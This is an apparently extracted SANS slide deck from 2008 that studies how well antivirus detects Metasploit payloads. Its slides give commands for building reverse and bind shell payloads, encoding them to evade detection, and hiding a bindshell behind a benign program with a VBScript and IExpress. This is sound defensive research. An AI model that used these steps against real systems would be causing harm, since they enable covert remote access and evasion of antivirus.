Metasploit Payloads and Antivirus Mark Baggett December 2008

advertisement
Metasploit Payloads and
Antivirus
Mark Baggett
December 2008
GIAC GSEC GCIH
SANS Technology Institute - Candidate for Master of Science Degree
1
1
Objectives
• Learn how an attacker might use
Metasploit standalone payloads
against you
• See how these payloads are
created, used and “trojanized”
• Understand what level of protection
to expect from your antivirus
SANS Technology Institute - Candidate for Master of Science Degree
2
How are they used against you?
• Can be executed by tricking a user into
running the payload or via an exploit that is
not in the framework
• Execute a payload on a fully patched system
• Use Meterpreter’s advanced functionality such
as anti-forensics, detection evasion, and
pivoting
• Scenario:
– Attacker bruteforces password to a fully patched
machine
– Runs Meterpreter payload and uses it to pivot
– Uses framework to attack other hosts on DMZ
SANS Technology Institute - Candidate for Master of Science Degree
3
msfpayload
• Generates payloads in various formats
– Source code in C, Perl, Ruby, Java
– Hexadecimal (RAW)
– Binary executable formats for Win32;
Linux; OS X on Intel, PPC, iPhone
– Java automatically selects Big Endian or
Little Endian depending upon processor of
targeted payload
– You can override this with a simple
modification to msfpayload (js_be, js_le)
SANS Technology Institute - Candidate for Master of Science Degree
4
Demonstration
• See how these payloads are created
SANS Technology Institute - Candidate for Master of Science Degree
5
Interacting with payloads
• Some payloads will not work standalone
– find_port, find_tag
• Bind shell payloads can be used outside
of the framework
• Others require the use of the
multi/handler exploit
SANS Technology Institute - Candidate for Master of Science Degree
6
Using multi/handler
CREATION - LHOST is the attacker’s IP
./msfpayload \
windows/vncinjection/reverse_tcp \
LHOST=192.168.100.5 X > vncrev.exe
USE - RHOST is the victim’s IP
./msfcli exploit/multi/handler \
PAYLOAD=windows/vncinject/reverse_tcp \
RHOST=192.168.100.3 \
DisableCourtesyShell=TRUE E
SANS Technology Institute - Candidate for Master of Science Degree
7
Demonstration
•See how these payloads are used
SANS Technology Institute - Candidate for Master of Science Degree
8
msfencode
• Will encode a payload using one of
various algorithms
• Expects RAW msfpayload as input
• -h for help
• -l list of available encoders
• -e encoder to use
• -t output type
• -b characters to avoid
SANS Technology Institute - Candidate for Master of Science Degree
9
msfencode -> Binary
• Binary was not a selectable output type
from msfencode until Sept 29th 2008
• 3 ways to create a binary
– Add 3 lines of code to msfencode
– Generate RAW output and use a hex editor
to place it in a binary PE format
– Generate C source code and compile it
• -t exe option will encode a Windows
binary
SANS Technology Institute - Candidate for Master of Science Degree
10
msfencode (continued)
• ./msfpayload windows/shell_bind_tcp R |\
./msfencode -e x86/shikata_ga_nia -t exe
• ./msfpayload windows/shell_bind_tcp R |\
./msfencode -e x86/shikata_ga_nia –b\
“\x41\x42\x43” -t exe
• Text.to_win32pe() uses /data/templates
– Use your own binaries with “PAYLOAD:” tag
– To_win32pe chooses a random base relocation
address (4 bytes at position 0x88)
– Roll your own with template.c
SANS Technology Institute - Candidate for Master of Science Degree
11
Turning payloads into trojans
• IExpress is a setup utility that comes
with Windows XP
• Can create packages that visibly execute
a benign host program and invisibly
execute a malicious payload
• All you need is a small VBscript to
execute your payload invisibly
• Trojan payloads only temporarily avoid
antivirus
SANS Technology Institute - Candidate for Master of Science Degree
12
Payload script
• The script
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "mspaint.exe",1, False
Wshshell.Run "bindshell.exe",0, False
• Quick IExpress Demonstration
– See how these payloads are “trojanized”
SANS Technology Institute - Candidate for Master of Science Degree
13
Level of protection to expect
from your antivirus
• Expected results: Low rate of detection for unencoded
payloads and no detection for encoded payloads
• Actual results: No detection for unencoded payloads or
encoded payloads
• 2 products’ heuristics flagged payloads
• Pauldotcom Episode 125 at the end of September
2008 found 6 systems detected the payload
• My HIPS testing yielded disappointing results
• HD Moore has stated that version 3.2 will generate a
new Windows Binary that is harder to detect.
SANS Technology Institute - Candidate for Master of Science Degree
14
Summary
• Metasploit is a powerful framework with a diverse set
of tools
• Using these tools attackers can easily create
standalone payloads that run on fully patched
systems
• Antivirus products do not at this time provide
adequate protection against Metasploit payloads
• My paper is in the SANS reading room titled
“Effectiveness of Antivirus Detecting Metasploit
Payloads”
SANS Technology Institute - Candidate for Master of Science Degree
15
Download